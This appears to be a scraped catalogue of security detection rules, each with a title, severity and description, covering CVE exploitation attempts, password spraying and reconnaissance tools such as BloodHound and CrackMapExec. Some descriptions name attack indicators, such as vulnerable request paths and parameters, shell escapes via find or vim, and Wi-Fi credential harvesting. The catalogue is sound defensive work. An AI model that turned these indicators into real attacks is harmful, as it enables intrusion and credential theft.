CVE-2022-31656 VMware Workspace ONE Access Auth BypasshighDetects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656 VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
Apache Spark Shell Command Injection - WeblogshighDetects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective
Atlassian Bitbucket Command Injection Via Archive APIhighDetects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
Potential OWASSRF Exploitation Attempt - ProxyhighDetects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint
OWASSRF Exploitation Attempt Using Public POC - ProxycriticalDetects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
Potential OWASSRF Exploitation Attempt - WebserverhighDetects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint
OWASSRF Exploitation Attempt Using Public POC - WebservercriticalDetects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
Exploitation Indicator Of CVE-2022-42475highDetects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd.
Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877highDetects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877
Potential CVE-2022-46169 Exploitation AttempthighDetects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169
CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21mediumDetects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.
Exploitation Indicators Of CVE-2023-20198highDetecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI.
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)highDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)mediumDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)mediumDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)mediumDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
Potential CVE-2023-2283 ExploitationmediumDetects potential exploitation attempt of CVE-2023-2283 an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. It is an error message that is a sign of an exploitation attempt. It is not a sign of a successful exploitation.
CVE-2023-23397 Exploitation AttemptcriticalDetects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
Potential CVE-2023-23752 Exploitation AttempthighDetects the potential exploitation attempt of CVE-2023-23752 an Improper access check, in web service endpoints in Joomla
Potential CVE-2023-25157 Exploitation AttempthighDetects a potential exploitation attempt of CVE-2023-25157 a SQL injection in GeoServer
Potential CVE-2023-25717 Exploitation AttempthighDetects a potential exploitation attempt of CVE-2023-25717 a Remote Code Execution via an unauthenticated HTTP GET Request, in Ruckus Wireless Admin
Potential CVE-2023-27997 Exploitation IndicatorsmediumDetects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the "enc" parameter
Potential MOVEit Transfer CVE-2023-34362 Exploitation - File ActivityhighDetects file indicators of potential exploitation of MOVEit CVE-2023-34362.
Potential Information Disclosure CVE-2023-43261 Exploitation - ProxyhighDetects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs.
Potential Information Disclosure CVE-2023-43261 Exploitation - WebhighDetects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs.
CVE-2023-46747 Exploitation Activity - ProxyhighDetects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
CVE-2023-46747 Exploitation Activity - WebserverhighDetects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - ProxyhighDetects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string.
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - ProxymediumDetects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs.
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - WebservermediumDetects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs.
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - WebserverhighDetects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string.
Potential Exploitation Attempt Of Undocumented WindowsServer RCEhighDetects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)
CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command InjectionhighDetects potential exploitation of CVE-2024-1709 an unauthenticated command injection in Progress Kemp LoadMaster. It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value with an uncommon character.
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - SecuritycriticalThis detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
CVE-2024-1709 - ScreenConnect Authentication Bypass ExploitationcriticalDetects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command InjectionhighDetects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
.Class Extension URI Ending RequestmediumDetects requests to URI ending with the ".class" extension in proxy logs. This could rules can be used to hunt for potential downloads of Java classes as seen for example in Log4shell exploitation attacks against Log4j.
WebDAV Temporary Local File CreationmediumDetects the creation of WebDAV temporary files with potentially suspicious extensions
OMIGOD SCX RunAsProvider ExecuteScripthighRule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
Multiple Suspicious Resp Codes Caused by Single ClientmediumDetects possible exploitation activity or bugs in a web application
Possible DNS RebindingmediumDetects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).
Password Spraying via Explicit CredentialsmediumDetects a single user failing to authenticate to multiple users using explicit credentials.
Multiple Users Failing to Authenticate from Single ProcessmediumDetects failed logins with multiple accounts from a single process on the system.
Valid Users Failing to Authenticate From Single Source Using KerberosmediumDetects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.
Disabled Users Failing To Authenticate From Source Using KerberosmediumDetects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.
Invalid Users Failing To Authenticate From Source Using KerberosmediumDetects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.
Valid Users Failing to Authenticate from Single Source Using NTLMmediumDetects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.
Invalid Users Failing To Authenticate From Single Source Using NTLMmediumDetects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.
Multiple Users Remotely Failing To Authenticate From Single SourcemediumDetects a source system failing to authenticate against a remote host with multiple users.
attack.discovery 245
Show Rules (245)
Title Level Description
AzureHound PowerShell CommandshighDetects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
Powershell File and Directory DiscoverylowAdversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
CrackMapExecWincriticalDetects CrackMapExecWin Activity as Described by NCSC
Trickbot Malware Reconnaissance ActivityhighDetects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.
Run Whoami as SYSTEMhighDetects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.
Domain Trust DiscoverymediumDetects a discovery of domain trusts.
Correct Execution of Nltest.exehighThe attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.
OpenCanary - SNMP OID RequesthighDetects instances where an SNMP service on an OpenCanary node has had an OID request.
Remote Schedule Task Recon via AtScvhighDetects remote RPC calls to read information about scheduled tasks via AtScv
Possible DCSync AttackhighDetects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.
Remote Event Log ReconhighDetects remote RPC calls to get event log information via EVEN or EVEN6
Remote Schedule Task Recon via ITaskSchedulerServicehighDetects remote RPC calls to read information about scheduled tasks
Remote Registry ReconhighDetects remote RPC calls to collect information
Recon Activity via SASechighDetects remote RPC calls to read information about scheduled tasks via SASec
SharpHound Recon Account DiscoveryhighDetects remote RPC calls useb by SharpHound to map remote connections and local group membership.
Potential Bucket Enumeration on AWSlowLooks for potential enumeration of AWS buckets via ListBuckets.
Discovery Using AzureHoundhighDetects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.
Bitbucket User Details Export Attempt DetectedmediumDetects user data export activity.
Google Cloud Storage Buckets EnumerationlowDetects when storage bucket is enumerated in Google Cloud.
Github Self Hosted Runner Changes DetectedlowA self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
Linux Network Service Scanning - AuditdlowDetects enumeration of local or remote network services.
Network Sniffing - LinuxlowNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Password Policy Discovery - LinuxlowDetects password policy discovery commands
System Information Discovery - AuditdlowDetects System Information Discovery commands
System and Hardware Information DiscoveryinformationalDetects system information discovery commands
System Owner or User Discovery - LinuxlowDetects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Shell Invocation via Apt - LinuxmediumDetects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Capabilities Discovery - LinuxlowDetects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
Crontab EnumerationlowDetects usage of crontab to list the tasks of the user
ESXi Network Configuration Discovery Via ESXCLImediumDetects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
ESXi Storage Information Discovery Via ESXCLImediumDetects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
ESXi System Information Discovery Via ESXCLImediumDetects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
ESXi VM List Discovery Via ESXCLImediumDetects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
ESXi VSAN Information Discovery Via ESXCLImediumDetects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
File and Directory Discovery - LinuxinformationalDetects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
Shell Execution via Find - LinuxhighDetects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
Shell Execution via Flock - LinuxhighDetects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Shell Execution GCC - LinuxhighDetects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
OS Architecture Discovery Via GreplowDetects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
Local System Accounts Discovery - LinuxlowDetects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Local Groups Discovery - LinuxlowDetects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
Potential GobRAT File Discovery Via GrephighDetects the use of grep to discover specific files created by the GobRAT malware
Shell Execution via Nice - LinuxhighDetects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Pnscan Binary Data Transmission ActivitymediumDetects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
Linux Remote System DiscoverylowDetects the enumeration of other remote systems.
Security Software Discovery - LinuxlowDetects usage of system utilities (only grep and egrep for now) to discover security software discovery
Container Residence Discovery Via Proc Virtual FSlowDetects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
Docker Container Discovery Via Dockerenv ListinglowDetects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
Potential Discovery Activity Using Find - LinuxmediumDetects usage of "find" binary in a suspicious manner to perform discovery
Potential Container Discovery Via Inodes ListinglowDetects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
Linux Network Service Scanning Tools ExecutionlowDetects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
System Information DiscoveryinformationalDetects system information discovery commands
System Network Connections Discovery - LinuxlowDetects usage of system utilities to discover system network connections
System Network Discovery - LinuxinformationalDetects enumeration of local network configuration
Vim GTFOBin Abuse - LinuxhighDetects the use of "vim" and it's siblings commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
System Integrity Protection (SIP) DisabledmediumDetects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
System Integrity Protection (SIP) EnumerationlowDetects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
File and Directory Discovery - MacOSinformationalDetects usage of system utilities to discover files and directories
System Information Discovery Using IoregmediumDetects the use of "ioreg" which will show I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
Local System Accounts Discovery - MacOslowDetects enumeration of local systeam accounts on MacOS
Local Groups Discovery - MacOsinformationalDetects enumeration of local system groups
MacOS Network Service ScanninglowDetects enumeration of local or remote network services.
Network Sniffing - MacOsinformationalDetects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Macos Remote System DiscoveryinformationalDetects the enumeration of other remote systems.
Security Software Discovery - MacOsmediumDetects usage of system utilities (only grep for now) to discover security software discovery
Potential Discovery Activity Using Find - MacOSmediumDetects usage of "find" binary in a suspicious manner to perform discovery
System Network Discovery - macOSinformationalDetects enumeration of local network configuration
System Information Discovery Using sw_versmediumDetects the use of "sw_vers" for system information discovery
System Information Discovery Via Sysctl - MacOSmediumDetects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments.
System Information Discovery Using System_ProfilermediumDetects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
System Network Connections Discovery - MacOsinformationalDetects usage of system utilities to discover system network connections
Cisco Collect DatalowCollect pertinent data from the configuration files
Cisco DiscoverylowFind information about network devices that is not stored in config files
Cisco SniffingmediumShow when a monitor or a span/rspan is setup or modified
PUA - Advanced IP/Port Scanner Update CheckmediumDetect the update check performed by Advanced IP/Port Scanner utilities.
Source Code Enumeration Detection by KeywordmediumDetects source code enumeration that use GET requests by keyword searches in URL strings
Potential Active Directory Reconnaissance/Enumeration Via LDAPmediumDetects potential Active Directory enumeration via LDAP
Azure AD Health Monitoring Agent Registry Keys AccessmediumThis detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
Azure AD Health Service Agents Registry Keys AccessmediumThis detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.
AD Privileged Users or Groups ReconnaissancehighDetect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs
Potential AD User Enumeration From Non-Machine AccountmediumDetects read access to a domain user from a non-machine account
Hacktool RulerhighThis events that are generated when using the hacktool Ruler by Sensepost
Password Policy EnumeratedmediumDetects when the password policy is enumerated.
Windows Pcap DriversmediumDetects Windows Pcap driver installation based on a list of associated .sys files.
SAM Registry Hive Handle RequesthighDetects handles requested to SAM registry hive
SCM Database Handle FailuremediumDetects non-system users failing to get a handle of the SCM database.
Reconnaissance ActivityhighDetects activity as "net user administrator /domain" and "net group domain admins /domain"
SysKey Registry Keys AccesshighDetects handle requests and access operations to specific registry keys to calculate the SysKey
DNS Server Discovery Via LDAP QuerylowDetects DNS server discovery via LDAP query requests from uncommon applications
Advanced IP Scanner - File EventmediumDetects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
BloodHound Collection FileshighDetects default file names outputted by the BloodHound collection tool SharpHound
GatherNetworkInfo.VBS Reconnaissance Script OutputmediumDetects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
Uncommon Connection to Active Directory Web ServicesmediumDetects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
Suspicious Network Connection to IP Lookup Service APIsmediumDetects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
Python Initiated ConnectionmediumDetects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
Use Get-NetTCPConnectionlowAdversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Potential Active Directory Enumeration Using AD Module - PsModulemediumDetects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
Malicious PowerShell Commandlets - PoshModulehighDetects Commandlet names from well-known PowerShell exploitation frameworks
AD Groups Or Users Enumeration Using PowerShell - PoshModulelowAdversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Use Get-NetTCPConnection - PowerShell ModulelowAdversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Suspicious Get Local Groups InformationlowAdversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Suspicious Get Information for SMB Share - PowerShell ModulelowAdversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
AADInternals PowerShell Cmdlets Execution - PsScripthighDetects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
Potential Active Directory Enumeration Using AD Module - PsScriptmediumDetects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
PowerShell ADRecon ExecutionhighDetects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
Get-ADUser Enumeration Using UserAccountControl FlagsmediumDetects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.
Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShellmediumDetects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
DirectorySearcher Powershell ExploitationmediumEnumerates Active Directory to determine computers that are joined to the domain
Active Directory Computers Enumeration With Get-AdComputerlowDetects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory.
Active Directory Group Enumeration With Get-AdGrouplowDetects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory
Automated Collection Bookmarks Using Get-ChildItem PowerShelllowAdversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Security Software Discovery Via Powershell ScriptmediumDetects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus
HackTool - WinPwn Execution - ScriptBlockhighDetects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
PowerShell Hotfix EnumerationmediumDetects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers
Malicious PowerShell Commandlets - ScriptBlockhighDetects Commandlet names from well-known PowerShell exploitation frameworks
Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlockmediumDetects the execution of powershell scripts with calls to the "Start-NetEventSession" cmdlet. Which allows an attacker to start event and packet capture for a network event session. Adversaries may attempt to capture network to gather information over the course of an operation. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.
Powershell Sensitive File DiscoverymediumDetect adversaries enumerate sensitive files
Detected Windows Software Discovery - PowerShellmediumAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
AD Groups Or Users Enumeration Using PowerShell - ScriptBlocklowAdversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Powershell Directory EnumerationmediumDetects technique used by MAZE ransomware to enumerate directories using Powershell
Password Policy Discovery With Get-AdDefaultDomainPasswordPolicylowDetetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.
Suspicious PowerShell Get Current UserlowDetects the use of PowerShell to identify the current logged user.
Suspicious GPO Discovery With Get-GPOlowDetect use of Get-GPO to get one GPO or all the GPOs in a domain.
Suspicious Process Discovery With Get-ProcesslowGet the processes that are running on the local computer.
Suspicious Get Local Groups Information - PowerShelllowAdversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Suspicious Get Information for SMB SharelowAdversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Powershell Suspicious Win32_PnPEntitylowAdversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.
User Discovery And Export Via Get-ADUser Cmdlet - PowerShellmediumDetects usage of the Get-ADUser cmdlet to collect user information and output it to a file
Console CodePage Lookup Via CHCPmediumDetects use of chcp to look up the system locale value as part of host discovery
File And SubFolder Enumeration Via Dir CommandlowDetects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
Active Directory Structure Export Via Csvde.EXEmediumDetects the execution of "csvde.exe" in order to export organizational Active Directory structure.
DirLister ExecutionlowDetect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
Potential Discovery Activity Via Dnscmd.EXEmediumDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
Potential Recon Activity Using DriverQuery.EXEhighDetect usage of the "driverquery" utility to perform reconnaissance on installed drivers
DriverQuery.EXE ExecutionmediumDetect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers
Domain Trust Discovery Via DsquerymediumDetects execution of "dsquery.exe" for domain trust discovery
Suspicious Kernel Dump Using DtracehighDetects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
File Explorer Folder Opened Using Explorer Folder Shortcut Via ShellhighDetects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
Recon Command Output Piped To Findstr.EXEmediumDetects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this technique to extract specific information they require in their reconnaissance phase.
Security Tools Keyword Lookup Via Findstr.EXEmediumDetects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.
Sysmon Discovery Via Default Driver Altitude Using Findstr.EXEhighDetects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
Fsutil Drive EnumerationlowAttackers may leverage fsutil to enumerated connected drives.
Gpresult Display Group Policy InformationmediumDetects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
HackTool - Bloodhound/Sharphound ExecutionhighDetects command line parameters used by Bloodhound and Sharphound hack tools
HackTool - Certify ExecutionhighDetects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
HackTool - Certipy ExecutionhighDetects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
HackTool - CrackMapExec ExecutionhighThis rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
HackTool - PCHunter ExecutionhighDetects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
HackTool - SharpLdapWhoami ExecutionhighDetects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
HackTool - SharpView ExecutionhighAdversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
HackTool - SharpLDAPmonitor ExecutionmediumDetects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
HackTool - SOAPHound ExecutionhighDetects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
HackTool - TruffleSnout ExecutionhighDetects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
HackTool - WinPwn ExecutionhighDetects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Suspicious Execution of HostnamelowUse of hostname to get information
Potential Reconnaissance Activity Via GatherNetworkInfo.VBSmediumDetects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
Firewall Configuration Discovery Via Netsh.EXElowAdversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
New Network Trace Capture Started Via Netsh.EXEmediumDetects the execution of netsh with the "trace" flag in order to start a network capture
Harvesting Of Wifi Credentials Via Netsh.EXEmediumDetect the harvesting of wifi credentials using netsh.exe
Suspicious Group And Account Reconnaissance Activity Using Net.EXEmediumDetects suspicious reconnaissance command line activity on Windows systems using Net.EXE Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
System Network Connections Discovery Via Net.EXElowAdversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Share And Session Enumeration Using Net.EXElowDetects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
Nltest.EXE ExecutionlowDetects nltest commands that can be used for information discovery
Potential Recon Activity Via Nltest.EXEmediumDetects nltest commands that can be used for information discovery
Network Reconnaissance ActivityhighDetects a set of suspicious network related commands often used in recon stages
